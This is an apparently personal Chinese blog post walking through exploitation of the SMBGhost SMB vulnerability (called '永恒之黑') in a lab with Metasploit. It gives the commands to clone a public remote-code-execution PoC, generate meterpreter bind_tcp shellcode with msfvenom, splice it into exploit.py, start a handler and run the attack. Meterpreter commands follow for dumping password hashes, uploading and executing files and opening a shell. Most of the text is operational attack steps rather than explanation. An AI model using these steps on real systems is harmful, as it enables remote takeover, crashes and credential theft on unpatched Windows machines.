首页 > 其他分享 >永恒之黑

永恒之黑

时间:2022-10-08 20:34:43浏览次数:63  
标签:set 攻击 192.168 exploit 模块 永恒 meterpreter

永恒之黑

metasploit模块简介

Auxiliary 辅助模块 为渗透测试信息搜集提供了大量的辅助模块支持

Exploits 攻击模块 利用发现的安全漏洞或配置弱点对远程目标系统 进行攻击,从而获得对远程目标系统访问权的代码组件。

Payload 攻击载荷模块 攻击成功后促使靶机运行的一段植入代码

Post 后渗透攻击模块 收集更多信息或进一步访问被利用的目标系统

Encoders 编码模块 将攻击载荷进行编码,来绕过防护软件拦截


开始(可以多开几个终端进行)

下载poc: git clone https://github.com/chompie1337/SMBGhost_RCE_PoC
解压 unzip SMB。。。

可互相ping一下进行验证
再进入目录下,进行检测:python3 exploit.py -ip 192.168.233.165(目标ip)

若存在该漏洞,目标服务器回蓝屏重启

 

 

 

 

 

 

msfconsole进入msf
进入msf生成木马:
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

 

 

进入SMB那个文件夹,找到exploit.py文件

替换POC,将上面生成的代码替换原文中的代码

 

 记得把buf全部替换成poc

 

 

 

(使用exp反弹shell)

启动Metasploit监听
开启MSF:msfconsole
开启监听:use exploit/multi/handler

设置payload:set payload windows/x64/meterpreter/bind_tcp
监听端口: set lport 4444
目标主机: set rhost 192.168.1.143
攻击:run

运行poc,自动建立连接:python3 exploit.py -ip 192.168.233.165

 

 

 

进入后相关命令
查看用户权限: meterpreter> getuid

获取hash密码: meterpreter> hashdump

上传文件: meterpreter> upload

执行文件: meterpreter> execute -f notepad.exe

获取屏幕截图:meterpreter>screenshot

获取shell:meterpreter>shell

 

 


简单好用的帮助指令
help/? 帮助菜单
exit 退出MSF控制台
Back 返回上一级
info 显示一个或者多个模块的信息

show 显示所给类型的模块

background 将当前操作在后台运行

use 使用所选择的模块
set 设置选项

unset 取消设置的选项
session 会话

标签:set,攻击,192.168,exploit,模块,永恒,meterpreter
From: https://www.cnblogs.com/ymcj552/p/16770122.html

相关文章

  • MS17-010漏洞复现(永恒之蓝)
    0x01:温馨提示微软已于2017年发布MS17-010补丁,修复了“永恒之蓝”攻击的系统漏洞,一定要及时更新Windows系统补丁。本次只是简易的复现MS17-010,成功的水准就是取得Shell......
  • 那永恒没骗我 离散也没有 这份爱只是活在 另外时空
    那永恒没骗我离散也没有这份爱只是活在另外时空如果每一声再见会开启一个新的空间每做一个梦是时空偶尔的重叠你好吗离开的人啊请帮我相爱到剧终\(~~~~~~~......
  • CVE-2017-0143(永恒之蓝)漏洞复现By metasploit
    一、永恒之蓝介绍永恒之蓝是在Windows的SMB服务处理SMBv1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端......